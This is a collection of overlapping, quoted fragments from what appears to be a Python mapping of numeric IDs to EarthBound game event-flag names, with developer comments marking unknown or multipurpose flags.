'FLYING_MAN_4_JOINS', 29: 'FLYING_MAN_5_JOINS', 30: 'POKEY_JOINS', 31: 'LIER_INSIDE_HOUSE',", "# TODO: Maybe \"can search for shyness book\"? This flag is set even", "639: 'TALKED_TO_MAGICANT_EVERDRED', 640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP', 641: 'HIDE_THREED_TO_DESERT_TOWN_MAP', 642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 'GOT_SATURN_RIBBON', 645:", "# 164 (???) 165: 'INVISIBLE_MAN_JOINS', 166: 'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED',", "'SHARK_GUARDING_FRANK_DEFEATED', 41: 'CHAOS_THEATER_STAGE_UNBLOCKED', 42: 'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ', 45: 'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL',", "Room in the Monotoli Building? 626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT',", "(Unknown. Something about the Runaway Five Bus?) 315: 'GHOSTS_BLOCKING_TWOSON', # 316 (Unknown. Something", "115: 'CHAOS_THEATER_BACKSTAGE_OPEN', 116: 'ORANGE_KID_ALT_TEXT', 117: 'INVESTED_IN_ORANGE_KID', 118: 'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND', 121:", "529 (???) 530: 'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533: 'NESS_ROOM_METEORITE_CRASH_MUSIC', 534: 'CITY_BUS_MUSIC', 535:", "525 (???) 526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', # 529 (???) 530: 'TRACY_NOT_AT_HER_ROOM',", "200: 'GOT_MOM_PHONE', 201: 'GOT_ESCARGO_EXPRESS_PHONE', 202: 'GOT_MACH_PIZZA_PHONE', 203: 'GOT_STOIC_CLUB_PHONE', 204: 'FLYING_MAN_1_DEAD', 205: 'FLYING_MAN_2_DEAD', 206:", "86: 'GOT_FRANKLIN_BADGE', 87: 'GOT_FLY_HONEY', 88: 'GOT_BAD_KEY_MACHINE', 89: 'GOT_SHYNESS_BOOK', 90: 'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA', 92:", "422: 'ONETT_DAYTIME', 423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING', 424: 'TENDA_SHOP_PLAIN_ROLL_1', 425: 'TENDA_SHOP_PLAIN_YOGURT', 426: 'TENDA_SHOP_PLAIN_ROLL_2', 427: 'TENDA_SHOP_SPICY_JERKY', 428:", "'NESS_SLEEPING_AT_HIS_BED', 478: 'SHOP_SCARABA_CONDIMENTS', 479: 'PHOTO_NESS_HOUSE_AVAILABLE', 480: 'PHOTO_SCAM_HOUSE_AVAILABLE', 481: 'PHOTO_CYCLE_SHOP_AVAILABLE', 482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE', 483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE',", "707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED', 711: 'GOT_PHOTO_DESERT_MINE', 712: 'GOT_PHOTO_FOURSIDE_BRIDGE', 713:", "AND STONEHENGE??) # 56 (Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE',", "'ZOMBIE_GUARDS_AWAY', 301: 'POKEY_WAITING_AT_DOOR', # 302 (???) 303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME', # 305 (???)", "'INVESTED_IN_APPLE_KID', 113: 'STUBBY_LEGS', 114: 'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN', 116: 'ORANGE_KID_ALT_TEXT', 117: 'INVESTED_IN_ORANGE_KID', 118: 'PAULAS_DAD_OUTSIDE',", "'SHOP_SOUTH_SCARABA_VARIETY', 600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN', 601: 'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED', 603: 'MINI_BARF_DEFEATED', 604: 'GOT_KEY_TO_THE_LOCKER', 605: 'USED_KEY_TO_THE_LOCKER',", "'HAPPY_THREED_PEOPLE', 591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 593: 'POO_TELEPORTING_TO_SUMMERS',", "635: 'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE', 638: 'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED', 640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP', 641:", "'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', # 671 (???) 672: 'POKEY_FLIES_AWAY_BY_HELICOPTER', 673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP', 674: 'HIDE_SCARABA_FOOD_TOWN_MAP', 675:", "dad and not talking to Everdred) 612: 'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615:", "761 (Unknown. Set when arriving in Threed, cleared when defeating Belch) 762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN',", "204: 'FLYING_MAN_1_DEAD', 205: 'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD', 207: 'FLYING_MAN_4_DEAD', 208: 'FLYING_MAN_5_DEAD', 209: 'VISITED_ONETT', 210:", "684: 'SHOW_FOURSIDE_HINT_TOWN_MAP', 685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690:", "578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP', 579: 'HIDE_SCARABA_HOTEL_TOWN_MAP', 580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584:", "to Bulldozer at Fourside Bridge?) 145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus at", "Venus show about to start?) 681: 'SHOW_ONETT_HINT_TOWN_MAP', 682: 'SHOW_TWOSON_HINT_TOWN_MAP', 683: 'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP',", "85: 'GOT_WAD_OF_BILLS', 86: 'GOT_FRANKLIN_BADGE', 87: 'GOT_FLY_HONEY', 88: 'GOT_BAD_KEY_MACHINE', 89: 'GOT_SHYNESS_BOOK', 90: 'GOT_DIAMOND', 91:", "330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS', 335: 'TONY_AT_BOARDING_SCHOOL_GATE', 336:", "fights you 391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', # The second Hieroglyph Guardian doesn't reference this flag", "(???) 672: 'POKEY_FLIES_AWAY_BY_HELICOPTER', 673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP', 674: 'HIDE_SCARABA_FOOD_TOWN_MAP', 675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY', 676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP', 677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP',", "'GOT_MOM_PHONE', 201: 'GOT_ESCARGO_EXPRESS_PHONE', 202: 'GOT_MACH_PIZZA_PHONE', 203: 'GOT_STOIC_CLUB_PHONE', 204: 'FLYING_MAN_1_DEAD', 205: 'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD',", "'YOUR_SANCTUARY_MUSIC', # 525 (???) 526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', # 529 (???)", "'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS',", "523 (Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC', # 525 (???) 526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2',", "Luckily, every version uses the same flag IDs FLAG_NAMES = { 1: 'TEMP_1',", "(???) 573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP',", "script for this battle 387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED', 389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED', 390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', #", "545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL', 547: 'LAST_MELODY_AT_PINK_CLOUD', 548: 'LAST_MELODY_AT_FIRE_SPRING', 549: 'QUEUE_OUTSIDE_CHAOS_THEATER', 550: 'GOT_SUPORMA', 551:", "'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL',", "'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON',", "The first Hieroglyph Guardian doesn't reference this flag and never fights you 391:", "'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus at Topolla?) 148: 'READ_HIEROGLYPHS', 149: 'POO_STARTS_HIS_JOURNEY', # 150 (Related", "'PHOTO_TOTO_AVAILABLE', 505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE', 506: 'PHOTO_PYRAMID_AVAILABLE', 507: 'PHOTO_SCARABA_OASIS_AVAILABLE', 508: 'PHOTO_DEEP_DARKNESS_AVAILABLE', 509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE',", "'POLICE_AT_METEORITE', 470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471: 'TALKED_TO_MOM', 472: 'TALKED_TO_POKEY_AT_METEORITE', 473: 'TRACY_AT_HALLWAY', 474: 'NESS_MOM_OUTSIDE', # 475", "Building? 626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI',", "'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP',", "the City Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', # 320 (???) #", "in Threed?) # 589 (Visibility flag for some Hotel Attendant?) 590: 'HAPPY_THREED_PEOPLE', 591:", "30: 'POKEY_JOINS', 31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36:", "'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE', 714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE', 715: 'GOT_PHOTO_MONOTOLI_BUILDING', 716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE', 717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE',", "'LEARNED_ABOUT_SHYNESS_BOOK', # TODO: Maybe \"can search for shyness book\"? This flag is set", "'USED_KEY_TO_THE_LOCKER', 606: 'DUNGEON_MAN_OPEN', # 607 (Unknown. Related to desert mine?) 608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609:", "550: 'GOT_SUPORMA', 551: 'GAVE_FOOD_TO_APPLE_KID', 552: 'GOT_ZOMBIE_PAPER', 553: 'GOT_BACKSTAGE_PASS', 554: 'GOT_YOGURT_DISPENSER', 555: 'FOURSIDE_DEPT_LIGHTS_OUT', 556:", "385: 'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's no NPC attached to the script", "(???) 526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', # 529 (???) 530: 'TRACY_NOT_AT_HER_ROOM', 531:", "'TENDA_SHOP_TALISMAN_COIN', 430: 'TENDA_SHOP_HALL_OF_FAME_BAT', # 431 (???) 432: 'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC', 434: 'STARMAN_DX_ABSENT', #", "'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD', 207: 'FLYING_MAN_4_DEAD', 208: 'FLYING_MAN_5_DEAD', 209: 'VISITED_ONETT', 210: 'VISITED_TWOSON', 211: 'VISITED_THREED',", "# 761 (Unknown. Set when arriving in Threed, cleared when defeating Belch) 762:", "Set when arriving in Threed, cleared when defeating Belch) 762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR',", "142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143: 'FOURSIDE_FREE_FROM_MONOTOLI', # 144 (Related to Bulldozer at Fourside Bridge?) 145:", "'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown. Related to traffic jam?) # 371 (???)", "'MASTER_BARF_DEFEATED', 277: 'GUARDIAN_MOLE_1_DEFEATED', 278: 'GUARDIAN_MOLE_2_DEFEATED', 279: 'GUARDIAN_MOLE_3_DEFEATED', 280: 'GUARDIAN_MOLE_4_DEFEATED', 281: 'GUARDIAN_MOLE_5_DEFEATED', # 282", "432: 'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC', 434: 'STARMAN_DX_ABSENT', # (Another flag for Starman DX defeated.", "'HIDE_THREED_TO_DESERT_TOWN_MAP', 642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3',", "'MINE_MOLES_DEFEATED', 73: 'GIYGAS_DEFEATED', 74: 'NESS_NIGHTMARE_DEFEATED', 75: 'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP', 78: 'GOT_ENTERTAINERS_TRAVEL_CHARM',", "(I hate multipurpose flags) # 233 (I hate multipurpose flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235:", "102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK', 103: 'LIBRARY_BATHROOM_MAN', # Referenced in unused text 104: 'POKEY_PUNISHED', 105: 'PATH_TO_TWOSON_OPEN',", "changes, maybe) 435: 'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED', 437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED', 439: 'GOT_MAGIC_TRUFFLE_1', 440:", "multipurpose flags) # 233 (I hate multipurpose flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN', 236:", "768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked when you talk to Tracy after defeating Giygas,", "673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP', 674: 'HIDE_SCARABA_FOOD_TOWN_MAP', 675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY', 676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP', 677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP', 678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', #", "341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', # 345 (Related to Lake", "# 302 (???) 303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME', # 305 (???) 306: 'LIER_INSIDE_CAVE_3', 307:", "774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775 (Can't get calls from Dad?) 776: 'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA',", "# 65 (???) 66: 'EVERDRED_DEFEATED', 67: 'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED', 69: 'BOOGEY_TENT_DEFEATED', 70: 'STARMAN_DX_DEFEATED',", "'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID',", "'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH', 141: 'GOT_TROUT_YOGURT', 142:", "'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY', 600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN', 601: 'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED', 603: 'MINI_BARF_DEFEATED', 604: 'GOT_KEY_TO_THE_LOCKER',", "773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for NPCs #457 and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', #", "349: 'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355:", "'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT',", "557: 'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563:", "'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS', 335: 'TONY_AT_BOARDING_SCHOOL_GATE',", "462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA', # 465 (???) 466: 'PICKY_SLEEPING_AT_METEORITE', # 467", "'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC', # 538 (???) 539: 'GIVEN_PLAYERS_NAME', #", "608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED', # 611 (Something about talking to Paula's", "'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3', 648: 'FOR_SALE_SIGN_CUSTOMER_4', 649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE',", "'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', # 619 (Unkonwn. Related to Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621:", "'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for NPCs #457 and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN',", "(Visibility flag for someone in Threed?) # 589 (Visibility flag for some Hotel", "'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE', 483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485: 'PHOTO_LAKE_TESS_AVAILABLE', 486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE',", "168: 'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???) 171: 'GOT_SATURN_LIFENOODLES', 172: 'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE',", "# 447 (???) # 448 (???) 449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452:", "'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED', 711: 'GOT_PHOTO_DESERT_MINE', 712: 'GOT_PHOTO_FOURSIDE_BRIDGE', 713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE', 714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE', 715: 'GOT_PHOTO_MONOTOLI_BUILDING',", "429: 'TENDA_SHOP_TALISMAN_COIN', 430: 'TENDA_SHOP_HALL_OF_FAME_BAT', # 431 (???) 432: 'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC', 434: 'STARMAN_DX_ABSENT',", "'TENDA_SHOP_PLAIN_YOGURT', 426: 'TENDA_SHOP_PLAIN_ROLL_2', 427: 'TENDA_SHOP_SPICY_JERKY', 428: 'TENDA_SHOP_BAG_OF_DRAGONITE', 429: 'TENDA_SHOP_TALISMAN_COIN', 430: 'TENDA_SHOP_HALL_OF_FAME_BAT', # 431", "354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED', 360:", "about Venus show about to start?) # 680 (Something about Venus show about", "Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE', #", "(???) # 163 (???) # 164 (???) 165: 'INVISIBLE_MAN_JOINS', 166: 'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2',", "82: 'GOT_RECEIVER_PHONE', 83: 'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS', 86: 'GOT_FRANKLIN_BADGE', 87: 'GOT_FLY_HONEY', 88:", "269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED', 273: 'MU_TRAINING_COMPLETE', 274: 'DUNGEON_MAN_AT_PALM_TREES', 275:", "# 321 (Something about Paula's Dad acknowledging the kidnapping) 322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM',", "431 (???) 432: 'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC', 434: 'STARMAN_DX_ABSENT', # (Another flag for Starman", "'PEOPLE_IN_ONETT', # 376 (Unknown. Set after Apple Kid calls you about the Gourmet", "Monotoli Building) -- Got kicked out of Pokey's Room in the Monotoli Building?", "'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME', 38: 'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE', 40: 'SHARK_GUARDING_FRANK_DEFEATED', 41: 'CHAOS_THEATER_STAGE_UNBLOCKED',", "676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP', 677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP', 678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', # 679 (Something about Venus show about", "662: 'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665: 'GOT_LETTER_FROM_MOM', 666: 'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS', 668:", "'DELIVERED_ZEXONYTE', 135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO:", "638: 'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED', 